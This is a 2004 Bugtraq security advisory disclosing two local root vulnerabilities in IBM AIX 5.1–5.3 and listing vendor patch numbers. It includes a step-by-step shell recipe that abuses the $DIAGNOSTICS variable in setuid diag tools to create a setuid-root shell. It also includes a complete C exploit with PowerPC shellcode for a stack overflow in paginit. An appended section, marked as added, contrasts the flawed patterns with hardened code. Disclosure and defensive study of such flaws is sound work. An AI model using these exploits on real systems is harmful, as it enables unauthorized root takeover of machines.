AIX 5.1/5.2/5.3 local root exploits

From: cees-bart (ceesb_at_cs.ru.nl)
Date: 12/20/04

  • Next message: Thierry Carrez: "[ GLSA 200412-14 ] PHP: Multiple vulnerabilities"
    Date: Mon, 20 Dec 2004 12:10:41 +0100
    To: bugtraq@securityfocus.com
    
    

    hi,

    i found some local security holes in IBM's AIX versions 5.1, 5.2 and 5.3
    (unix for IBM RS/6000 powerpc).

    1) the first is a bug in all setuid diag related tools that use an
    environment variable as a prefix to an external binary executed as root.

    2) the second is a classical stack overflow in a tool called paginit.

    status: vendor contacted, patches are available:

    1) for the diag bug, bugfix numbers are IY64389(5.1), IY64523(5.2), and
    IY64277(5.3).
    2) for the paginit bug, bugfix numbers are IY64358(5.1), IY64522(5.2),
    and IY64312(5.3).

    bug descriptions below.

    regards,
    cees-bart
    phd student @ university of nijmegen

    ---
    bug 1:
    there are (at least) 4 broken suid binaries.
    -r-sr-xr-x   1 root     system        10014 Sep 16 2002  /usr/sbin/lsmcode
    -r-sr-x---   1 root     system         2796 Jan 26 2003  /usr/sbin/diag_exec
    -r-sr-xr-x   1 root     system       450433 Apr 08 2004  /usr/sbin/invscout
    -r-sr-xr-x   1 root     system       511362 Apr 08 2004  /usr/sbin/invscoutd
    all these binaries are exploited the same way: the path set in the
    $DIAGNOSTICS environment variable is used by these binaries to execute
    $DIAGNOSTICS/bin/Dctrl as root (duh).
    for example, executing the following gives a root shell:
    mkdirhier /tmp/aap/bin
    export DIAGNOSTICS=/tmp/aap
    cat > /tmp/aap/bin/Dctrl << EOF
    #!/bin/sh
    cp /bin/sh /tmp/.shh
    chown root:system /tmp/.shh
    chmod u+s /tmp/.shh
    EOF
    chmod a+x /tmp/aap/bin/Dctrl
    lsmcode
    /tmp/.shh
    bug 2:
    the following setuid binary:
    -r-sr-xr-x   1 root     security       7354 Mar 12 2003  /usr/bin/paginit
    does not do a bounds check on the first commandline argument, which is 
    supposed to be a username.
    if you feed paginit the proper data and hit enter, root privileges are
    gained.
    POC exploit code:
    /* exploit for /usr/bin/paginit
       tested on: AIX 5.2
       if the exploit fails it's because the shellcode
       ends up at a different address. use dbx to check,
       and change RETADDR accordingly.
       cees-bart <ceesb@cs.ru.nl>
    */
    #include <string.h>
    #include <unistd.h>

    /* stack address the overwritten return address is pointed at;
       it only has to land somewhere inside the landing zone below */
    #define RETADDR 0x2ff22c90

    /* PowerPC execve("/bin/sh") shellcode; its first word
       (xor. r5,r5,r5) is also what the landing zone is filled with */
    char shellcode[] =
    "\x7c\xa5\x2a\x79"
    "\x40\x82\xff\xfd"
    "\x7c\xa8\x02\xa6"
    "\x38\xe0\x11\x11"
    "\x39\x20\x48\x11"
    "\x7c\xc7\x48\x10"
    "\x38\x46\xc9\x05"
    "\x39\x25\x11\x11"
    "\x38\x69\xef\x17"
    "\x38\x87\xee\xef"
    "\x7c\xc9\x03\xa6"
    "\x4e\x80\x04\x20"
    "\x2f\x62\x69\x6e"
    "\x2f\x73\x68\x00"
    ;

    /* landing zone + shellcode travel as the value of env var X */
    char envlabel[] = "X=";

    /* store x as a big-endian 32-bit word (PowerPC byte order) */
    void printint(char* buf, int x) {
      buf[0] = x >> 24;
      buf[1] = (x >> 16) & 0xff;
      buf[2] = (x >> 8) & 0xff;
      buf[3] = x & 0xff;
    }

    int main(int argc, char **argv) {
      char *env[3];
      char code[1000];        /* "X=" + landing zone + shellcode */
      char buf[8000];         /* oversized first argument (the "username") */
      char *p, *i;
      int offset1 = 0;        /* shift of the landing zone; e.g. atoi(argv[1]) */

      memset(code, 'C', sizeof(code));
      memcpy(code, envlabel,sizeof(envlabel)-1);
      // landingzone: repeat the harmless first shellcode instruction
      // (stop 4 bytes before the end so the last word stays in bounds)
      for(i=code+sizeof(envlabel)+offset1; i+4<=code+sizeof(code); i+=4)
        printint(i, 0x7ca52a79);
      // shellcode sits at the very end of the environment string
      memcpy(code+sizeof(code)-sizeof(shellcode), shellcode, sizeof(shellcode)-1);
      code[sizeof(code)-1] = 0;

      env[0] = code;
      env[1] = 0;
      memset(buf, 'A', sizeof(buf));
      buf[sizeof(buf)-1] = 0;

      p = buf;
      p += 4114;
      printint(p,RETADDR); // try to hit the landingzone
      p += 72;
      printint(p, RETADDR); // any readable address (apparently not overwritten)
      execle("/usr/bin/paginit", "/usr/bin/paginit", buf, (char *)0, env);
      return 1;              // only reached if execle fails
    }
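    Added example, not code from the advisory above: the two coding mistakes it
    describes, each next to a hardened form. Bug 1 is a setuid-root tool that lets
    an environment variable pick the program it executes; bug 2 is an unchecked
    copy of argv[1] into a fixed stack buffer. The default root
    /usr/lpp/diagnostics, the 8-character login-name limit and all function names
    are assumptions made for illustration, not taken from AIX.

```c
/* Added example, not from the advisory.  The default root path, the
 * login-name limit and every function name here are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define DEFAULT_DIAG_ROOT "/usr/lpp/diagnostics"  /* assumed compile-time default */
#define LOGIN_NAME_LEN    8                       /* assumed AIX login-name limit */

/* Helper: "<root>/bin/Dctrl" as a malloc'd string (caller frees). */
static char *join_dctrl(const char *root)
{
    size_t n = strlen(root) + sizeof("/bin/Dctrl");   /* sizeof counts the NUL */
    char *path = malloc(n);
    if (path == NULL)
        return NULL;
    snprintf(path, n, "%s/bin/Dctrl", root);
    return path;
}

/* Bug 1 as written: whatever the caller put in $DIAGNOSTICS decides which
 * file a setuid-root tool executes. */
char *dctrl_path_vulnerable(const char *env_diagnostics)
{
    return join_dctrl(env_diagnostics != NULL ? env_diagnostics : DEFAULT_DIAG_ROOT);
}

/* Hardened: the override is honoured only when the process is not running
 * with borrowed privilege (real uid == effective uid) and the value is an
 * absolute path without ".." components; a setuid invocation always gets
 * the compile-time path. */
char *dctrl_path_safe(const char *env_diagnostics, uid_t ruid, uid_t euid)
{
    const char *root = DEFAULT_DIAG_ROOT;
    if (ruid == euid && env_diagnostics != NULL && env_diagnostics[0] == '/' &&
        strstr(env_diagnostics, "/..") == NULL)
        root = env_diagnostics;
    return join_dctrl(root);
}

/* Bug 2 as written: the first argument is copied into a fixed stack buffer
 * with no length check.  Only call this with a short name; a long one
 * overruns the buffer just as the paginit argument did. */
int login_len_vulnerable(const char *arg)
{
    char user[LOGIN_NAME_LEN + 1];
    strcpy(user, arg);                          /* no bounds check */
    return (int)strlen(user);
}

/* Hardened: look for the terminator within the destination size before
 * copying anything.  Returns the name length, or -1 if it does not fit. */
int login_copy_safe(const char *arg, char *out, size_t outlen)
{
    const char *nul = memchr(arg, '\0', outlen);
    if (nul == NULL)                            /* no NUL within outlen bytes */
        return -1;
    size_t n = (size_t)(nul - arg);
    memcpy(out, arg, n + 1);
    return (int)n;
}

int main(int argc, char **argv)
{
    char name[LOGIN_NAME_LEN + 1];
    const char *diag = getenv("DIAGNOSTICS");
    const char *arg = argc > 1 ? argv[1] : "guest";
    char *unsafe = dctrl_path_vulnerable(diag);
    char *safe = dctrl_path_safe(diag, getuid(), geteuid());

    printf("would exec (unsafe): %s\n", unsafe ? unsafe : "(alloc failed)");
    printf("would exec (safe):   %s\n", safe ? safe : "(alloc failed)");
    free(unsafe);
    free(safe);

    if (login_copy_safe(arg, name, sizeof name) < 0)
        fprintf(stderr, "login name longer than %d characters, refusing\n", LOGIN_NAME_LEN);
    else
        printf("login name: %s\n", name);
    return 0;
}
```

    Run it as DIAGNOSTICS=/tmp/aap ./a.out AAAAAAAAAAAAAAAA to see the unsafe
    path follow the environment while the over-long name is refused. When run by
    the same user it was started by, the safe variant also follows the variable;
    the two differ only when real and effective uid disagree, which is exactly
    the setuid case the advisory exploits.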
      
    
